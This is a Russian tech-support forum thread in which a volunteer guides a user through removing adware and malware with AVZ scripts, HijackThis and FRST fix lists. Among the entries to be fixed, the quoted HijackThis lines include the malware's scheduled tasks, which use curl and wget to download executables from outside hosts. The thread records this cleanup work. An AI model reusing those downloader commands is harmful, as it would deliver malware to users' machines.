Вирусы в трее, и нежелательные сайты

@Deiska_zp · Регистрация: 07.02.2018

Студворк — интернет-сервис помощи студентам

Добрый день. Компьютер начал сильно тормозить, начались сильные тормоза, не возможно нормально зайти на сайт - вылазит реклама. Какие-то непонятные процессы висят. Просьба помочь решить проблему. Спасибо

@Sandor · 20.05.2018, 16:22

Здравствуйте!

Два антивируса - много:

AV: ESET NOD32 Antivirus 7.0
AV: AVG Antivirus

Один оставьте, один удалите. После чего пройдитесь соотв. утилитой удаления:
Чистка системы после некорректного удаления антивируса

Внимание! Рекомендации написаны специально для пользователя Deiska_zp. Если рекомендации написаны не для вас, не используйте их - это может повредить вашей системе.
Если у вас похожая проблема - создайте тему в разделе Лечение компьютерных вирусов и выполните Правила запроса о помощи.
________________________________________ ______________

Через Панель управления - Удаление программ - удалите нежелательное ПО:

Auslogics BoostSpeed 10
setupsk
Unity Web Player
Интернет

Закройте все программы, временно выгрузите антивирус, файерволл и прочее защитное ПО.

Выполните скрипт в AVZ (Файл - Выполнить скрипт):

Code
begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
SearchRootkit(true, true);
SetAVZGuardStatus(True);
 ClearQuarantineEx(true);
 QuarantineFile('C:\Documents and Settings\Vika\Application Data\Microsoft\Internet Explorer\Quick Launch\Вoйти в Интeрнет.lnk', '');
 QuarantineFile('C:\Documents and Settings\Vika\Local Settings\Application Data\Microsoft\Start Menu\Вoйти в Интeрнeт.lnk', '');
 QuarantineFile('C:\Documents and Settings\Vika\Рабочий стол\Вoйти в Интeрнет.lnk', '');
 QuarantineFile('C:\WINDOWS\microsoft\svchost.exe.exe', '');
 DeleteFile('C:\Documents and Settings\Vika\Application Data\Microsoft\Internet Explorer\Quick Launch\Вoйти в Интeрнет.lnk');
 DeleteFile('C:\Documents and Settings\Vika\Local Settings\Application Data\Microsoft\Start Menu\Вoйти в Интeрнeт.lnk');
 DeleteFile('C:\Documents and Settings\Vika\Рабочий стол\Вoйти в Интeрнет.lnk');
 DeleteFile('C:\WINDOWS\microsoft\svchost.exe.exe', '32');
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'yvkcbpqpfs');
BC_ImportALL;
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
BC_Activate;
RebootWindows(true);
end.

Компьютер перезагрузится.

После перезагрузки, выполните такой скрипт:

Code
begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
end.

Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью формы вверху этой темы или с помощью этой формы.
К сообщению прикреплять файл quarantine.zip не нужно!

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):

Code
R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Start Page] = [url]http://eqvizin.ru/?utm_source=startpage03&utm_content=47ef32b2cbf37681759fbc823bbc67e3&utm_term=401ACEE19B83E448808A5A843AE0388E&utm_d=20170716[/url]
O4 - HKCU\..\Run: [yvkcbpqpfs] = [url]http://smartinf.ru/?utm_source=uoua03&utm_content=c0ec7e674ea93801ae9d177aa83505ae&utm_term=401ACEE19B83E448808A5A843AE0388E&utm_d=20170716[/url]  (file missing)
O4 - MSConfig\startupreg: setupsk [command] = C:\Documents and Settings\Vika\Application Data\setupsk\python\pythonw.exe "C:\DOCUME~1\Vika\APPLIC~1\setupsk\ml.py" --APPNAME="setupsk" (HKCU) (2018/05/18)
O4 - MSConfig\startupreg: setupsk_upd [command] = C:\Documents and Settings\Vika\Application Data\setupsk_upd\python\pythonw.exe "C:\DOCUME~1\Vika\APPLIC~1\SETUPS~1\ml.py" --APPNAME="setupsk_upd" (HKCU) (2018/05/18)
O22 - Task (Job): (Ready) curl.job - C:\Documents and Settings\Vika\Application Data\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Documents and Settings\Vika\Application Data\curl\curl.exe"
O22 - Task (Job): (Ready) wget.job - C:\Documents and Settings\Vika\Application Data\wget\wget_1_19_4.exe -f -k -s -L [url]http://izerni.ru/An711Rb8q51c56o02P58HA4eHDxE20tS[/url] -o "C:\Documents and Settings\Vika\Application Data\wget\wget.exe"

Файл CheckBrowserLnk.log
из папки

...\AutoLogger\CheckBrowserLnk

перетащите на утилиту ClearLNK.

Отчёт о работе в виде файла ClearLNK-<Дата>.log прикрепите к вашему следующему сообщению.
Подготовьте новый CollectionLog. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".

@Deiska_zp · 21.05.2018, 18:59 **[ТС]**

Добрый день.

Сделал все как Вы сказали, логи прикрепил.
Спасибо

@Sandor · 22.05.2018, 16:42

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Отметьте галочками также "Shortcut.txt".

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
(Если не помещаются, упакуйте).
Подробнее читайте в этом руководстве.

@Deiska_zp · 23.05.2018, 17:00 **[ТС]**

Добрый день.
Отчеты во вложении.
Спасибо

@Sandor · 23.05.2018, 17:31

Отключите до перезагрузки антивирус.

Выделите следующий код:

Code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
Start::
CreateRestorePoint:
GroupPolicy: Restriction ? <==== ATTENTION
GroupPolicy\User: Restriction ? <==== ATTENTION
SearchScopes: HKU\S-1-5-21-1085031214-583907252-1606980848-1003 -> {A06ED961-D98F-4CF9-A89B-80AB11DB149C} URL = hxxp://go-search.ru/search?q={searchTerms}
Handler: http\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\PROGRA~1\COMMON~1\System\OLEDB~1\MSDAIPP.DLL No File []
Handler: http\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\PROGRA~1\COMMON~1\System\OLEDB~1\MSDAIPP.DLL No File []
Handler: https\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\PROGRA~1\COMMON~1\System\OLEDB~1\MSDAIPP.DLL No File []
Handler: https\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\PROGRA~1\COMMON~1\System\OLEDB~1\MSDAIPP.DLL No File []
Handler: ipp\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\PROGRA~1\COMMON~1\System\OLEDB~1\MSDAIPP.DLL No File []
Handler: msdaipp\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\PROGRA~1\COMMON~1\System\OLEDB~1\MSDAIPP.DLL No File []
Handler: msdaipp\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\PROGRA~1\COMMON~1\System\OLEDB~1\MSDAIPP.DLL No File []
CHR HomePage: Profile 7 -> mail.ru/cnt/11956636?rciguc__PARAM__
CHR DefaultSearchURL: Profile 7 -> hxxp://go.mail.ru/search?q={searchTerms}&fr=chxtn7.0.25__PARAM__
CHR DefaultSearchKeyword: Profile 7 -> mail.ru
CHR DefaultSuggestURL: Profile 7 -> hxxp://suggests.go.mail.ru/chrome?q={searchTerms}
2018-05-18 20:28 - 2018-05-21 21:34 - 000000276 ____H C:\WINDOWS\Tasks\wgets.job
Task: C:\WINDOWS\Tasks\wgets.job => C:\Documents and Settings\Vika\Application Data\curl\wget.exe
EmptyTemp:
Reboot:
End::

Скопируйте выделенный текст (правой кнопкой - Копировать).
Запустите FRST (FRST64) от имени администратора.
Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

@Deiska_zp · 24.05.2018, 19:03 **[ТС]**

Добрый день.
Во вложении.
Спасибо

@Sandor · 25.05.2018, 13:31

Что сейчас с проблемой?

@Deiska_zp · 22.06.2018, 18:47 **[ТС]**

Добрый день. Извиняюсь за длительное отсутствие. Вроде как в трее не висят какие-то неизвестные процессы, но быстродействие компьютера по-прежнему оставляет желать лучшего, до заражения вирусами такого не было.

@Sandor · 23.06.2018, 16:44

Загрузитесь в безопасном режиме и сравните быстродействие. Результат сообщите.

Новые блоги и статьи Все статьи Все блоги /
http://iceja.net/ сервер решения полиномов iceja 18.01.2026 Выкатила http:/ / iceja. net/ сервер решения полиномов (находит действительные корни полиномов методом Штурма). На сайте документация по API, но скажу прямо VPS слабенький и 200 000 полиномов. . .	Первый деплой lagorue 16.01.2026 Не спеша развернул своё 1ое приложение в kubernetes. А дальше мне интересно создать 1фронтэнд приложения и 2 бэкэнд приложения развернуть 2 деплоя в кубере получится 2 сервиса и что-бы они. . .	Расчёт переходных процессов в цепи постоянного тока igorrr37 16.01.2026 / * Дана цепь постоянного тока с R, L, C, k(ключ), U, E, J. Программа составляет систему уравнений по 1 и 2 законам Кирхгофа, решает её и находит: токи, напряжения и их 1 и 2 производные при t = 0;. . .	Восстановить юзерскрипты Greasemonkey из бэкапа браузера damix 15.01.2026 Если восстановить из бэкапа профиль Firefox после переустановки винды, то список юзерскриптов в Greasemonkey будет пустым. Но восстановить их можно так. Для этого понадобится консольная утилита. . .
Изучаю kubernetes lagorue 13.01.2026 А пригодятся-ли мне знания kubernetes в России?	Сукцессия микоризы: основная теория в виде двух уравнений. anaschu 11.01.2026 https:/ / rutube. ru/ video/ 7a537f578d808e67a3c6fd818a44a5c4/	WordPad для Windows 11 Jel 10.01.2026 WordPad для Windows 11 — это приложение, которое восстанавливает классический текстовый редактор WordPad в операционной системе Windows 11. После того как Microsoft исключила WordPad из. . .	Classic Notepad for Windows 11 Jel 10.01.2026 Old Classic Notepad for Windows 11 Приложение для Windows 11, позволяющее пользователям вернуть классическую версию текстового редактора «Блокнот» из Windows 10. Программа предоставляет более. . .

@Sandor 22443 / 15899 / 3078 Регистрация: 08.10.2012 Сообщений: 64,775
	22.05.2018, 16:42
	Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе. Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением. Отметьте галочками также "Shortcut.txt". Нажмите кнопку Scan. После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению. (Если не помещаются, упакуйте). Подробнее читайте в этом руководстве. 0

@Sandor 22443 / 15899 / 3078 Регистрация: 08.10.2012 Сообщений: 64,775
	25.05.2018, 13:31
	Что сейчас с проблемой? 0

@Deiska_zp 0 / 0 / 0 Регистрация: 07.02.2018 Сообщений: 20
	22.06.2018, 18:47 [ТС]
	Добрый день. Извиняюсь за длительное отсутствие. Вроде как в трее не висят какие-то неизвестные процессы, но быстродействие компьютера по-прежнему оставляет желать лучшего, до заражения вирусами такого не было. Миниатюры 0

@Sandor 22443 / 15899 / 3078 Регистрация: 08.10.2012 Сообщений: 64,775
	23.06.2018, 16:44
	Загрузитесь в безопасном режиме и сравните быстродействие. Результат сообщите. 0